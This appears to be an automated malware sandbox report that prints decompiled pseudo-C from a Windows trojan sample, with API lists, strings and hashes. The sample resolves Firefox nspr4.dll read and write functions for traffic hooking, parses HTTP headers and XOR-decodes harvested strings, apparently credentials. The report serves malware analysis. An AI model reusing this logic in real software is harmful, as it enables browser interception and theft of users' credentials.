0x0041b558
0x0041b2c1
0x0041b2b2

APIs

Part of subcall function 0040C330: CreateMutexW.KERNEL32(0042E930,00000000,0042D490,74B05520,00000000), ref: 0040C37B
Part of subcall function 0040C330: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040C38A
Part of subcall function 0040C330: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C3B5

HeapAlloc.KERNEL32(?,00000008,?), ref: 0041B2EF
HeapFree.KERNEL32(?,00000000,?), ref: 0041B334
ReleaseMutex.KERNEL32(00000000), ref: 0041B342
CloseHandle.KERNEL32(00000000), ref: 0041B349
HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 0041B516

Part of subcall function 00418C20: HeapFree.KERNEL32(?,00000000,00000000,00000010,?,00000000,?,?,0041ACB1,?,?,?,743C1521,00000002), ref: 00418C74

HeapFree.KERNEL32(?,00000000,00000000), ref: 0041B52E
HeapFree.KERNEL32(?,00000000,?), ref: 0041B548

Strings

?*, xrefs: 0041B383

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$AllocMutex$CloseCreateHandleObjectReleaseSingleWait
String ID: ?*
API String ID: 2942989357-3267162389
Opcode ID: 4790de8df53c1235fb339639d98eb2b158f4a1ccb7ed36d0660164a69d303383
Instruction ID: 4a123ba8b7a2ecbcc64a9486f8cc4b673b514dbb06cf6442ff29a14f08b77eea
Opcode Fuzzy Hash: 4790de8df53c1235fb339639d98eb2b158f4a1ccb7ed36d0660164a69d303383
Instruction Fuzzy Hash: F091E3709083855ED725CB3888447ABBBD5EF89314F18455EE89187382DB38DCC683DA

Uniqueness

Uniqueness Score: -1.00%

Function 004167B0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004167B0() {
				long _t54;
				long _t58;
				signed int _t59;
				WCHAR* _t61;
				long _t64;
				long _t70;
				long _t72;
				signed int _t80;
				signed int _t84;
				signed char _t85;
				void* _t87;
				signed int _t96;
				char* _t97;
				signed short* _t98;
				intOrPtr _t99;
				signed int _t100;
				void* _t107;
				void* _t108;
				signed int _t111;
				void* _t113;

				_t100 =  *(_t113 + 0x20) & 0x000000ff;
				_t96 =  *(_t113 + 0x20) & 0x000000ff;
				if(_t100 != _t96) {
					_t54 = GetTickCount();
					if(_t54 !=  *0x42dd08) {
						 *0x42dd08 = _t54;
						E00412320(_t54);
					}
					_t84 = E00412360() - _t55 / (_t100 - _t96 + 1) * (_t100 - _t96 + 1) + _t96;
					 *(_t113 + 0x24) = _t84;
					_t100 = _t84;
				} else {
					 *(_t113 + 0x24) = _t100;
				}
				_t58 = GetTickCount();
				if(_t58 !=  *0x42dd08) {
					 *0x42dd08 = _t58;
					E00412320(_t58);
				}
				_t59 = E00412360();
				_t97 = "bcdfghklmnpqrstvwxz";
				if((_t59 & 0x00000100) == 0) {
					 *(_t113 + 0xc) = "aeiouy";
					 *(_t113 + 0x10) = "bcdfghklmnpqrstvwxz";
				} else {
					 *(_t113 + 0xc) = _t97;
					 *(_t113 + 0x10) = "aeiouy";
				}
				_t80 = 0;
				_t111 = 0;
				 *(_t113 + 0x28) = 0;
				if(_t100 > 0) {
					 *(_t113 + 0x10) =  *(_t113 + 0x20) & 0x00000004;
					L13:
					while(1) {
						if(_t80 == 2) {
							_t72 = GetTickCount();
							if(_t72 !=  *0x42dd08) {
								 *0x42dd08 = _t72;
								E00412320(_t72);
							}
							if((E00412360() & 0x00000100) == 0) {
								 *(_t113 + 0x14) = "aeiouy";
								 *(_t113 + 0x18) = _t97;
							} else {
								 *(_t113 + 0x14) = _t97;
								 *(_t113 + 0x18) = "aeiouy";
							}
							_t80 = 0;
						}
						_t99 =  *((intOrPtr*)(_t113 + 0x14 + _t80 * 4));
						asm("sbb esi, esi");
						_t107 = ( ~(_t99 - "bcdfghklmnpqrstvwxz") & 0xfffffff3) + 0x13;
						if( *(_t113 + 0x10) == 0 || _t111 -  *(_t113 + 0x28) <= 1) {
							L26:
							_t108 = _t107 - 1;
							if(_t108 != 0) {
								_t64 = GetTickCount();
								if(_t64 !=  *0x42dd08) {
									 *0x42dd08 = _t64;
									E00412320(_t64);
								}
								_t87 = E00412360() - _t65 / (_t108 + 1) * (_t108 + 1);
							} else {
								_t87 = 0;
							}
							_t59 =  *((char*)(_t99 + _t87));
							 *( *(_t113 + 0x24) + _t111 * 2) = _t59;
						} else {
							_t70 = GetTickCount();
							if(_t70 !=  *0x42dd08) {
								 *0x42dd08 = _t70;
								E00412320(_t70);
							}
							_t59 = E00412360() & 0x00000101;
							if(_t59 != 0x101) {
								goto L26;
							} else {
								 *( *(_t113 + 0x24) + _t111 * 2) = 0x20;
								 *(_t113 + 0x28) = _t111;
							}
						}
						_t111 = _t111 + 1;
						_t80 = _t80 + 1;
						if(_t111 <  *(_t113 + 0x2c)) {
							_t97 = "bcdfghklmnpqrstvwxz";
							continue;
						}
						_t100 =  *(_t113 + 0x2c);
						goto L34;
					}
				}
				L34:
				_t85 =  *(_t113 + 0x20);
				if((_t85 & 0x00000004) == 0 || _t100 == 0) {
					_t98 =  *(_t113 + 0x1c);
				} else {
					_t98 =  *(_t113 + 0x1c);
					_t59 = _t98 + _t100 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t100 = _t100 - 1;
						if(_t100 != 0) {
							continue;
						} else {
						}
						goto L41;
					}
				}
				L41:
				_t98[_t100] = 0;
				if((_t85 & 0x00000002) != 0) {
					_t61 = CharUpperW( *_t98 & 0x0000ffff);
					 *_t98 = _t61;
					return _t61;
				}
				return _t59;
			}

0x004167b4
0x004167ba
0x004167c1
0x004167c9
0x004167d5
0x004167d7
0x004167dc
0x004167dc
0x004167f4
0x004167f6
0x004167fa
0x004167c3
0x004167c3
0x004167c3
0x004167fc
0x00416808
0x0041680a
0x0041680f
0x0041680f
0x00416814
0x00416819
0x00416823
0x00416833
0x0041683b
0x00416825
0x00416825
0x00416829
0x00416829
0x00416844
0x00416847
0x00416849
0x0041684f
0x0041685c
0x00000000
0x00416867
0x0041686a
0x0041686c
0x00416878
0x0041687a
0x0041687f
0x0041687f
0x0041688e
0x0041689e
0x004168a6
0x00416890
0x00416890
0x00416894
0x00416894
0x004168aa
0x004168aa
0x004168ac
0x004168ba
0x004168bf
0x004168c7
0x00416910
0x00416910
0x00416911
0x00416917
0x00416923
0x00416925
0x0041692a
0x0041692a
0x0041693e
0x00416913
0x00416913
0x00416913
0x00416940
0x00416949
0x004168d4
0x004168d4
0x004168e0
0x004168e2
0x004168e7
0x004168e7
0x004168f1
0x004168fb
0x00000000
0x004168fd
0x00416906
0x0041690a
0x0041690a
0x004168fb
0x0041694d
0x0041694e
0x00416953
0x00416862
0x00000000
0x00416862
0x00416959
0x00000000
0x00416959
0x00416867
0x0041695d
0x0041695d
0x00416966
0x00416982
0x0041696c
0x0041696c
0x00416970
0x00416974
0x0041697a
0x0041697d
0x0041697e
0x00000000
0x00000000
0x00416980
0x00000000
0x0041697e
0x00416974
0x00416986
0x00416988
0x0041698f
0x00416995
0x0041699b
0x00000000
0x0041699b
0x004169a3

APIs

GetTickCount.KERNEL32 ref: 004167C9
GetTickCount.KERNEL32 ref: 004167FC
GetTickCount.KERNEL32 ref: 0041686C
GetTickCount.KERNEL32 ref: 004168D4
GetTickCount.KERNEL32 ref: 00416917
CharUpperW.USER32(00000000), ref: 00416995

Strings

bcdfghklmnpqrstvwxz, xrefs: 00416819, 0041683B, 00416862, 004168B2
aeiouy, xrefs: 00416829, 00416833, 00416894, 0041689E

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CountTick$CharUpper
String ID: aeiouy$bcdfghklmnpqrstvwxz
API String ID: 466868486-1727281576
Opcode ID: f5fecc61265fe6ef4f3ae1547ff2a2be4697bdf38866b1aef2714e1f46d19fe7
Instruction ID: 7190d3ddee896ede0d60032a6b0db2b17c6f5fb73911955b0f1966371fdee0a8
Opcode Fuzzy Hash: f5fecc61265fe6ef4f3ae1547ff2a2be4697bdf38866b1aef2714e1f46d19fe7
Instruction Fuzzy Hash: 6C510171D143109BC320AF2495491AABBE5BFC4314F56492FE895E72A0C37CDAC5CB8E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9D0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041C9D0() {
				void _v524;
				long _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t19;
				struct HINSTANCE__* _t26;
				void* _t41;
				void* _t44;

				InitializeCriticalSection(0x42ede8);
				_t38 = 0;
				 *0x42eddc = 0;
				 *0x42ede4 = 0;
				 *0x42ede0 = 0;
				 *0x42e8f4 = 0;
				 *0x42ee14 = 0;
				 *0x42ee94 = 0;
				 *0x42ee98 = 0;
				InitializeCriticalSection(0x42ee7c);
				E0041D210(0,  &_v524);
				_v528 = 0x1fe;
				_t34 = 0xffffffff;
				_t41 = CreateFileW( &_v524, 0x80000000, 1, 0, 3, 0, 0);
				if(_t41 != 0xffffffff) {
					_t38 = _v528;
					ReadFile(_t41,  &_v524, _v528,  &_v528, 0);
					_t34 =  !=  ? _v528 : 0xffffffff;
					CloseHandle(_t41);
				}
				_t19 = _t34;
				if(_t34 == 0xffffffff || (_t34 & 0x00000001) != 0) {
					_t19 = 0;
				}
				 *((short*)(_t44 + 0x18 + (_t19 >> 1) * 2)) = 0;
				E0040AC10( &_v524);
				E00407870( &_v524, 0, _t38, 0);
				 *0x42e71c = 0;
				 *0x42e7ec = 0;
				InitializeCriticalSection(0x42edc4);
				E004266C0();
				_t26 = GetModuleHandleW(L"nspr4.dll");
				_t51 = _t26;
				if(_t26 != 0 && E0041E890(_t38, _t26, _t51) != 0) {
					 *0x42e700 =  *0x42e700 | 0x00000001;
				}
				E0041E610();
				return 1;
			}

0x0041c9e5
0x0041c9eb
0x0041c9f2
0x0041c9f7
0x0041c9fe
0x0041ca05
0x0041ca0a
0x0041ca0f
0x0041ca14
0x0041ca19
0x0041ca21
0x0041ca39
0x0041ca41
0x0041ca4a
0x0041ca4f
0x0041ca51
0x0041ca62
0x0041ca6a
0x0041ca70
0x0041ca70
0x0041ca76
0x0041ca7b
0x0041ca82
0x0041ca82
0x0041ca88
0x0041ca91
0x0041ca9a
0x0041caa4
0x0041caaa
0x0041cab0
0x0041cab2
0x0041cabc
0x0041cac2
0x0041cac4
0x0041cad1
0x0041cad1
0x0041cad8
0x0041cae9

APIs

InitializeCriticalSection.KERNEL32(0042EDE8,?,00000000,?,00000000), ref: 0041C9E5
InitializeCriticalSection.KERNEL32(0042EE7C,?,00000000,?,00000000), ref: 0041CA19
CreateFileW.KERNEL32 ref: 0041CA44
ReadFile.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 0041CA62
CloseHandle.KERNEL32(00000000), ref: 0041CA70
InitializeCriticalSection.KERNEL32(0042EDC4), ref: 0041CAB0
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 0041CABC

Strings

nspr4.dll, xrefs: 0041CAB7

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateModuleRead
String ID: nspr4.dll
API String ID: 1419303690-741017701
Opcode ID: 0ebb81f68cbf51a1810601070def739ad2cf0e360a7adde858448913c0ea90d8
Instruction ID: f9700dfaeb0cb33f06f31449c982fe5d827adb82d1ea0dd809343f677e90017f
Opcode Fuzzy Hash: 0ebb81f68cbf51a1810601070def739ad2cf0e360a7adde858448913c0ea90d8
Instruction Fuzzy Hash: 1021BF312403005BD310EF76AD89A9B7BE8EF84750F840A3EB515D31B0E7789886CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0041E890, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041E890(void* __edx, struct HINSTANCE__* __esi, void* __eflags) {
				void* __ebx;
				void* __edi;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t12;
				intOrPtr _t13;
				intOrPtr _t15;

				 *0x42d348 = GetProcAddress(__esi, "PR_OpenTCPSocket");
				 *0x42d358 = GetProcAddress(__esi, "PR_Close");
				 *0x42d368 = GetProcAddress(__esi, "PR_Read");
				 *0x42d378 = GetProcAddress(__esi, "PR_Write");
				_t12 = E0041E560(4, GetProcAddress, 0x42d348);
				if(_t12 != 0) {
					_t7 =  *0x42d380; // 0x0
					_t13 =  *0x42d370; // 0x0
					_t15 =  *0x42d360; // 0x0
					_t8 =  *0x42d350; // 0x0
					E00407930(__esi, _t8, _t15, _t13, _t7);
				}
				return _t12;
			}

0x0041e8a6
0x0041e8b3
0x0041e8c0
0x0041e8d1
0x0041e8db
0x0041e8df
0x0041e8e1
0x0041e8e6
0x0041e8ec
0x0041e8f3
0x0041e8fd
0x0041e8fd
0x0041e906

APIs

GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0041E89E
GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0041E8AB
GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0041E8B8
GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0041E8C5

Part of subcall function 0041E560: VirtualAllocEx.KERNEL32(000000FF,00000000,00000034,00003000,00000040,77E49EB0,00000000,7743A6D0,0041E88B,0042D008,00000000,0041CADD), ref: 0041E595

Part of subcall function 00407930: InitializeCriticalSection.KERNEL32(0042D3C4,00000000,0041E902,00000000,00000000,00000000,00000000,0042D348), ref: 00407944
Part of subcall function 00407930: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00407982
Part of subcall function 00407930: GetProcAddress.KERNEL32(00000000,PR_SetError), ref: 00407995
Part of subcall function 00407930: GetProcAddress.KERNEL32(00000000,PR_GetError), ref: 004079A8

Strings

PR_Read, xrefs: 0041E8AD
PR_Close, xrefs: 0041E8A0
PR_Write, xrefs: 0041E8BA
PR_OpenTCPSocket, xrefs: 0041E898

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: 75ed6ea55011da22a0b47e04b1b042b6d47336d752c5ca886dd4aa18bc8817ef
Instruction ID: 9cbb10fc318e0978e96923f2ede07792dfff2833d56e48d464e900323557f706
Opcode Fuzzy Hash: 75ed6ea55011da22a0b47e04b1b042b6d47336d752c5ca886dd4aa18bc8817ef
Instruction Fuzzy Hash: 93F0FFF5B51354AAD320EBB9EC85E573BACAB89B00764403BF800A72A1D6789442CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00408050, Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 242
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00408050(void* __eflags, intOrPtr _a4, int _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v20;
				char _v24;
				signed int* _v28;
				intOrPtr _v40;
				char _v44;
				char _v60;
				char _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				void* __esi;
				int _t39;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t50;
				signed int _t51;
				void* _t62;
				char _t66;
				int _t67;
				intOrPtr _t68;
				char* _t69;
				int _t72;
				signed int _t73;
				void* _t78;
				void* _t85;
				void* _t86;
				signed int* _t87;
				void* _t88;
				intOrPtr _t90;
				char* _t91;
				signed int* _t93;
				void* _t97;
				intOrPtr _t98;
				void* _t99;

				_t67 = _a8;
				_t90 = _a12;
				_t39 = E00410890(_t67, _t90, "\r\n\r\n", 4);
				_v20 = _t39;
				if(_t39 != 0) {
					if(_t39 == _t67) {
						L21:
						return _t39 | 0xffffffff;
					} else {
						E00410870(_a4, _a4, 0, 0x10);
						_push( &_v24);
						_push(0);
						_push(_t90);
						_push(_t67);
						_t39 = E00417950();
						_t71 = _t39;
						if(_t39 != 0 && _v28 == 8) {
							_t39 = E00411B20(7, _t71, 7, "HTTP/1.");
							if(_t39 == 0) {
								_t97 = _t67 + _t90;
								while(_t67 < _t97) {
									_t91 = _t67;
									_t39 = _t67;
									if(_t67 < _t97) {
										while(1) {
											_t78 =  *_t39;
											if(_t78 == 0xa || _t78 == 0xd) {
												goto L11;
											}
											_t39 =  &(1[_t39]);
											if(_t39 < _t97) {
												continue;
											}
											goto L11;
										}
									}
									L11:
									_t72 =  &(1[_t39]);
									_t85 = _t39 - _t67;
									if(_t72 < _t97 &&  *_t39 == 0xd &&  *_t72 == 0xa) {
										_t39 = _t72;
									}
									_t67 =  &(1[_t39]);
									if(_t85 == 0) {
										goto L21;
									} else {
										if(_t91 == _v8) {
											_t86 = _t85 + _t91;
											_t73 = 0;
											if(_t91 >= _t86) {
												goto L21;
											} else {
												do {
													_t39 =  *_t91;
													if(_t39 == 0x20 || _t39 >= 9 && _t39 <= 0xd) {
														if(_t73 < 2) {
															 *(_t99 + 0x14 + _t73 * 4) = _t91;
														}
														_t73 =  &(1[_t73]);
													}
													_t91 =  &(_t91[1]);
												} while (_t91 < _t86);
												if(_t73 != 2) {
													goto L21;
												} else {
													_t93 =  &(_v28[0]);
													_t39 = _v24 - _t93;
													goto L38;
												}
											}
										} else {
											if(_t85 == 0) {
												goto L20;
											} else {
												_t39 = StrCmpNIA(1, _t91, 0);
												if(_t39 != 0 ||  *_t91 != 0x3a) {
													goto L20;
												} else {
													_t88 = _t85 + _t91;
													do {
														_t66 = _t91[1];
														_t91 =  &(_t91[1]);
													} while (_t66 == 0x20 || _t66 >= 9 && _t66 <= 0xd);
													_t39 = _t88 - _t91;
													L38:
													_v28 = _t39;
													if(_t93 == 0 || _t39 != 3 ||  *_t93 != 0x32) {
														goto L21;
													} else {
														_t39 = 0x30;
														if(_t93[0] != 0x30 || _t93[0] != 0x30) {
															goto L21;
														} else {
															_t98 = _v4;
															_t80 =  &_v28;
															_push( &_v28);
															_push("Transfer-Encoding");
															_push(_t98);
															_push(_v8);
															_t46 = E00417950();
															_t74 = _t46;
															if(_t46 == 0) {
																_t87 = _v28;
																goto L47;
															} else {
																_t80 = _v44;
																_t39 = E00411B20(7, _t74, _v44, "chunked");
																if(0x30 != 0) {
																	goto L21;
																} else {
																	_t87 = _v28;
																	 *_t87 =  *_t87 | 0x00000002;
																	L47:
																	_t68 = _v24;
																	_push( &_v44);
																	_push("Content-Length");
																	_push(_t98);
																	_push(_t68);
																	_t47 = E00417950();
																	_t94 = _t47;
																	if(_t47 == 0) {
																		L53:
																		_push( &_v60);
																		_push("Connection");
																		_push(_t98);
																		_push(_t68);
																		_t48 = E00417950();
																		_t76 = _t48;
																		if(_t48 == 0 || _v76 != 5 || E00411B20(5, _t76, 5, "close") != 0) {
																			_push( &_v76);
																			_push("Proxy-Connection");
																			_push(_t98);
																			_push(_t68);
																			_t50 = E00417950();
																			_t77 = _t50;
																			if(_t50 != 0 && _v92 == 5 && E00411B20(5, _t77, 5, "close") == 0) {
																				goto L59;
																			}
																		} else {
																			L59:
																			 *_t87 =  *_t87 | 0x00000001;
																		}
																		_t51 =  *_t87;
																		if((_t51 & 0x00000007) == 0) {
																			 *_t87 = _t51 | 0x00000001;
																		}
																		_t87[2] = _v84 - _t68 + 4;
																		return 1;
																	} else {
																		_t62 = E00410E10(_v60, _t94);
																		_t96 = _t62;
																		if(_t62 == 0) {
																			_t69 = 1;
																		} else {
																			_t87[1] = E00410FE0(_t62, _t80);
																			_t69 = 0;
																		}
																		_t39 = E004107C0(_t96);
																		 *_t87 =  *_t87 | 0x00000004;
																		if(_t69 != 0) {
																			goto L21;
																		} else {
																			_t68 = _v40;
																			goto L53;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									goto L63;
									L20:
								}
							}
						}
						goto L21;
					}
				} else {
					return _t39;
				}
				L63:
			}

0x00408054
0x0040805a
0x00408068
0x0040806d
0x00408073
0x00408081
0x00408129
0x00408133
0x00408087
0x00408090
0x00408099
0x0040809a
0x0040809c
0x0040809d
0x0040809e
0x004080a3
0x004080a7
0x004080c0
0x004080c7
0x004080c9
0x004080ce
0x004080d0
0x004080d2
0x004080d6
0x004080d8
0x004080d8
0x004080dd
0x00000000
0x00000000
0x004080e4
0x004080e7
0x00000000
0x00000000
0x00000000
0x004080e7
0x004080d8
0x004080e9
0x004080eb
0x004080ee
0x004080f2
0x004080fe
0x004080fe
0x00408100
0x00408105
0x00000000
0x00408107
0x0040810b
0x00408136
0x00408138
0x0040813c
0x00000000
0x00408140
0x00408140
0x00408140
0x00408144
0x00408151
0x00408153
0x00408153
0x00408157
0x00408157
0x00408158
0x00408159
0x00408160
0x00000000
0x00408162
0x0040816a
0x0040816b
0x00000000
0x0040816b
0x00408160
0x0040810d
0x0040810f
0x00000000
0x00408111
0x00408116
0x0040811e
0x00000000
0x0040816f
0x0040816f
0x00408171
0x00408171
0x00408174
0x00408175
0x00408183
0x00408185
0x00408185
0x0040818b
0x00000000
0x00408197
0x00408197
0x0040819c
0x00000000
0x004081a3
0x004081a3
0x004081ab
0x004081af
0x004081b0
0x004081b5
0x004081b6
0x004081b7
0x004081bc
0x004081c0
0x004081e6
0x00000000
0x004081c2
0x004081c2
0x004081d0
0x004081d7
0x00000000
0x004081dd
0x004081dd
0x004081e1
0x004081ea
0x004081ea
0x004081f2
0x004081f3
0x004081f8
0x004081f9
0x004081fa
0x004081ff
0x00408203
0x00408238
0x0040823c
0x0040823d
0x00408242
0x00408243
0x00408244
0x00408249
0x00408252
0x00408270
0x00408271
0x00408276
0x00408277
0x00408278
0x0040827d
0x00408281
0x00000000
0x00000000
0x0040829b
0x0040829b
0x0040829b
0x0040829b
0x0040829e
0x004082a2
0x004082a7
0x004082a7
0x004082b2
0x004082c1
0x00408205
0x00408209
0x0040820e
0x00408212
0x00408220
0x00408214
0x00408219
0x0040821c
0x0040821c
0x00408224
0x00408229
0x0040822e
0x00000000
0x00408234
0x00408234
0x00000000
0x00408234
0x0040822e
0x00408203
0x004081d7
0x004081c0
0x0040819c
0x0040818b
0x0040811e
0x0040810f
0x0040810b
0x00000000
0x00408125
0x00408125
0x004080ce
0x004080c7
0x00000000
0x004080a7
0x0040807c
0x0040807c
0x0040807c
0x00000000

APIs

StrCmpNIA.SHLWAPI(00000001,00000000,00000000,HTTP/1.,?,?,00000000,00000004,?,00000000,00000010,?,?,), ref: 00408116

Strings

Transfer-Encoding, xrefs: 004081B0
Proxy-Connection, xrefs: 00408271
close, xrefs: 0040825A, 00408289
Connection, xrefs: 0040823D
, xrefs: 00408061
HTTP/1., xrefs: 004080B9
chunked, xrefs: 004081C6
Content-Length, xrefs: 004081F3

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
API String ID: 0-1412996494
Opcode ID: 7661bec7ae00a195cf369e40d1c2679e28a3d2868bf0d541fab37001a736806b
Instruction ID: 4f0a6b4814501ece17e4ab50f1d8175e81376bd5909d69b821a5b5c76d1d8581
Opcode Fuzzy Hash: 7661bec7ae00a195cf369e40d1c2679e28a3d2868bf0d541fab37001a736806b
Instruction Fuzzy Hash: 5E7101316043125BDB209A299E41BABBB959F51714F14083FF8C1BB2D1DE78DC8A879E

Uniqueness

Uniqueness Score: -1.00%

Function 00422370, Relevance: 13.7, APIs: 9, Instructions: 237
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00422370(WCHAR* __ecx, signed char* __edx, intOrPtr _a4) {
				short _v524;
				char _v532;
				char _v584;
				char _v588;
				char _v596;
				char _v604;
				char _v612;
				char _v616;
				void* _v628;
				intOrPtr _v632;
				void* _v636;
				signed int _v640;
				char _v644;
				char* _v652;
				void* _v656;
				char _v660;
				char* _v664;
				char* _v668;
				intOrPtr _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t69;
				void* _t78;
				intOrPtr _t94;
				intOrPtr _t103;
				intOrPtr _t110;
				void* _t111;
				void* _t114;
				void* _t125;
				signed int _t126;
				char* _t127;
				intOrPtr* _t128;
				WCHAR* _t131;
				intOrPtr _t149;
				signed int _t157;
				void* _t166;
				signed char* _t170;
				intOrPtr _t173;
				char* _t174;
				intOrPtr _t177;
				void** _t178;
				signed int _t180;
				void* _t182;

				_t131 = __ecx;
				_t182 = (_t180 & 0xfffffff8) - 0x28c;
				_t170 = __edx;
				_t69 = __edx + 0x2c;
				if(_t69 != 0) {
					L1:
					_t157 =  *_t69 & 0x0000ffff;
					if(_t157 == 0x5c || _t157 == 0x2f) {
						_t69 =  &(_t69[1]);
						goto L1;
					}
				}
				if(PathCombineW( &_v524, _t131, _t69) == 0) {
					L39:
					return 1;
				} else {
					if(( *_t170 & 0x00000010) == 0) {
						if(E00418040(2,  &_v532,  &_v636) != 0) {
							_t125 = _v636;
							_t173 = E00411430(_v632, _t125,  &_v660, 1, 0);
							_v660 = _t173;
							if(_t173 != 0xffffffff) {
								_v656 = HeapAlloc( *0x42e6d4, 8, 0x626);
								E004240C0(0x91,  &_v596);
								E004240C0(0x92,  &_v612);
								E004240C0(0x93,  &_v604);
								E004240C0(0x94,  &_v584);
								if(_v656 != 0) {
									_t126 = 0;
									_v640 = 0;
									if(_t173 != 0) {
										do {
											_t94 = _v660;
											if( *(_t94 + _t126 * 4) != 0) {
												_v652 = StrStrIA( *(_t94 + _t126 * 4),  &_v596);
												_t174 = StrStrIA( *(_v664 + _t126 * 4),  &_v616);
												_v664 = StrStrIA( *(_v668 + _t126 * 4),  &_v612);
												_t127 = StrStrIA( *(_v672 + _t126 * 4),  &_v596);
												_t103 = _v664;
												if(_t103 != 0) {
													_t149 = _v668;
													if(_t149 != 0 && _t127 != 0) {
														_v664 = _t103 + 8;
														_v668 = _t149 + 6;
														_t128 = _t127 + 0xa;
														E00422340(_t103 + 8);
														E00422340(_t149 + 6);
														E00422340(_t128);
														if(_t174 == 0) {
															L18:
															_t166 = 0x15;
														} else {
															_t47 = _t174 + 6; // 0x6
															E00422340(_t47);
															_t48 = _t174 + 6; // 0x6
															_t166 = E004110A0(_t48, 0);
															if(_t166 < 1 || _t166 > 0xffff) {
																goto L18;
															}
														}
														if( *_v664 != 0 &&  *_v668 != 0) {
															_t110 =  *_t128;
															if(_t110 != 0) {
																if(_t110 == 0x30 || _t110 == 0x31) {
																	if( *((char*)(_t128 + 1)) != 0) {
																		goto L25;
																	}
																} else {
																	L25:
																	_t111 = 0;
																	if( *_t128 != 0) {
																		do {
																			 *(_t111 + _t128) =  *(_t111 + _t128) ^ 0x00000019;
																			_t111 = _t111 + 1;
																		} while ( *(_t111 + _t128) != 0);
																		if(_t111 > 0) {
																			E00424100(0x57,  &_v588);
																			_push(_t166);
																			_push(_v664);
																			_push(_t128);
																			_t176 = _v672;
																			_push(_v668);
																			_t114 = E00411D10(_v664, 0x311, _v672,  &_v588);
																			_t182 = _t182 + 0x14;
																			if(_t114 > 0) {
																				_t177 = _a4;
																				if(E00410D70(_t177, _t176, _t114) != 0) {
																					 *((intOrPtr*)(_t177 + 4)) =  *((intOrPtr*)(_t177 + 4)) + 1;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
												_t126 = _v656;
												_t173 = _v660;
											}
											_t126 = _t126 + 1;
											_v640 = _t126;
										} while (_t126 < _t173);
									}
									HeapFree( *0x42e6d4, 0, _v656);
									_t125 = _v636;
								}
								E004107E0(_t173, _v660);
							}
							if(_t125 != 0) {
								VirtualFree(_t125, 0, 0x8000);
							}
							_t78 = _v628;
							if(_t78 != 0) {
								CloseHandle(_t78);
							}
						}
						goto L39;
					} else {
						_t178 =  &_v636;
						E00424100(0x90, _t178);
						_v644 = _t178;
						E00418700( &_v532,  &_v644, 1, 5, E00422370, _a4, 0, 0, 0);
						return 1;
					}
				}
			}

0x00422370
0x00422376
0x0042237e
0x00422380
0x00422386
0x00422388
0x00422388
0x0042238e
0x00422395
0x00000000
0x00422395
0x0042238e
0x004223ac
0x00422645
0x0042264d
0x004223b2
0x004223b5
0x00422410
0x00422416
0x0042242d
0x0042242f
0x00422436
0x00422450
0x0042245d
